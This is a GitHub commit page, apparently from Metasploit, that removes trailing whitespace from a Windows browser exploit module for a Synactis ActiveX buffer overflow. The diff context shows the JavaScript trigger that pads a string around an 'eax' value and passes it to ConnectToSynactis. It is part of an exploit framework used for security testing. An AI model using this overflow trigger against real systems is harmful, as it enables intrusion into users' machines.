Skip to content

Commit e559824

Browse files
committed
Remove whitespace
1 parent d3e57ff commit e559824

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -170,10 +170,10 @@ def get_html(cli, req, target)
170170
var p1 = '';
171171
var p2 = '';
172172
eax = "#{eax}";
173-
173+
174174
while (p1.length < 189) p1 += "\\x41";
175175
while (p2.length < 7000) p2 += "\\x42";
176-
176+
177177
var obj = document.getElementById("obj");
178178
obj.ConnectToSynactis(p1+eax+p2);
179179
}

0 commit comments

Comments
 (0)